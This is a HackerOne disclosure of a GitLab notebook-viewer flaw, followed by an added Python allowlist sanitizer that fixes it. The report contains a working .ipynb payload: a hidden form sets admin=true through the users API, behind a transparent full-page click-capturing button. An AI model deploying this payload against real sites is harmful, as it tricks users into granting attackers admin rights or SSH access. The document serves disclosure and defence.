
Issue any HTTP request when users view a .ipynb notebook and click anywhere

HackerOne report #1563379 by yvvdwf on 2022-05-09, assigned to GitLab Team:


Report

Summary

Hello,

The sanitization of the .ipynb notebook viewer does not exclude the form tag. Consequently attackers may introduce a form which allows sending arbitrary POST requests to the server. PUT, DELETE and PATCH requests can be achieved by setting the value of the _method field.

Attackers may also use the class attribute to turn the form's submit button into a topmost transparent layer that intercepts users' clicks. In the following example, users clicking anywhere on the webpage trigger a form submit.

Steps to reproduce
  1. In an existing project, or a new one, add a file named notebook-test.ipynb (you can change the basename, but the .ipynb extension is important) with the following content:

{
  "cells": [
    {
      "cell_type": "code",
      "source": [ "print(\"Hello world\")"],
      "outputs": [
        {
          "data": {
            "text/html": [
              "<form action=/api/v4/users/5212593 method=post>",
              "<input name=_method value=PUT type=hidden>",
              "<input name=admin value=true type=hidden>",
              "<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>"
            ]
          }
        }
      ]
    }
  ]
}

  2. After committing the file, view it and click anywhere on the webpage. You will see a POST request to /api/v4/users/5212593. This is an example of escalating my account to Admin.
Impact

Attackers may trick users into performing unintended actions, such as (1) adding the attacker as an Admin or to a private group, (2) adding the attacker's SSH key, etc.

Examples

This example is in private mode, please tell me if you cannot access: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb

What is the current bug behavior?

The sanitization does not exclude the form tag.

What is the expected correct behavior?

The form tag should be excluded.

Output of checks

This bug happens on GitLab.com
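
The behaviour the report asks for, shown as an added example that is not GitLab's own sanitizer: an allowlist sanitizer for the text/html outputs of a notebook. It drops form, button, select and textarea elements together with everything nested inside them, removes any input tag, and discards the class attribute on every surviving element, so cell output cannot become a page-covering, transparent submit button. The tag and attribute allowlists, the OutputSanitizer class and the helper names are assumptions chosen for illustration; the sample notebook is the report's payload with the submit value shortened.

```python
"""Allowlist sanitizer for the "text/html" outputs of a Jupyter notebook.

Added example, not GitLab's code. <form>, <input> and <button> never reach
the rendered page, and the class attribute is discarded so output cannot be
styled into a page-covering, transparent submit button. The tag and
attribute lists below are assumptions, not GitLab's actual configuration.
"""
import copy
from html import escape
from html.parser import HTMLParser

# Tags that may survive in rendered output (assumed conservative set).
ALLOWED_TAGS = {"a", "b", "br", "code", "div", "em", "i", "img", "li", "ol", "p",
                "pre", "span", "strong", "table", "tbody", "td", "th", "thead",
                "tr", "ul"}
# Per-tag attribute allowlist. "class" is deliberately absent everywhere.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
# Elements dropped together with everything nested inside them.
DROP_WITH_CONTENT = {"form", "button", "select", "textarea", "script", "style"}
# Elements that never carry content, so they do not affect nesting depth.
VOID_TAGS = {"br", "img", "input"}
SAFE_URL_PREFIXES = ("http://", "https://", "/", "#", "mailto:")


class OutputSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth += 1  # track nesting so we know when we leave
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # e.g. a stray <input>: the tag is removed, any text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # this is where "class" (and every other extra) is dropped
            value = value or ""
            if name in ("href", "src") and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # blocks javascript: and data: URLs
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))


def sanitize_html(fragment):
    """Return an allowlisted copy of an HTML fragment."""
    parser = OutputSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_notebook(nb):
    """Sanitize every text/html output of a notebook dict; returns a new dict."""
    clean = copy.deepcopy(nb)
    for cell in clean.get("cells", []):
        for output in cell.get("outputs", []):
            data = output.get("data", {})
            if "text/html" in data:
                raw = data["text/html"]
                if isinstance(raw, list):  # nbformat allows a list of lines
                    raw = "".join(raw)
                data["text/html"] = sanitize_html(raw)
    return clean


# Constructed sample: the payload from the report, with the submit value shortened.
REPORTED_NOTEBOOK = {
    "cells": [{
        "cell_type": "code",
        "source": ["print(\"Hello world\")"],
        "outputs": [{"data": {"text/html": [
            "<form action=/api/v4/users/5212593 method=post>",
            "<input name=_method value=PUT type=hidden>",
            "<input name=admin value=true type=hidden>",
            "<input type=submit class='fixed-top fixed-bottom text-hide' value='zzz'>",
        ]}}],
    }],
}

if __name__ == "__main__":
    clean = sanitize_notebook(REPORTED_NOTEBOOK)
    print(repr(clean["cells"][0]["outputs"][0]["data"]["text/html"]))  # nothing survives
    print(sanitize_html('<p class="x">Hello <b>world</b></p><form action=/x method=post>'
                        '<input type=submit value=go></form><a href="javascript:alert(1)">bad</a>'))
```

Because the form and its inputs are dropped with their contents, the reported payload sanitizes to an empty string, while ordinary formatting in the same cell (paragraphs, bold text, links with http(s) targets) is preserved. An unclosed form at the end of an output is also handled conservatively: everything after it is discarded rather than rendered.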
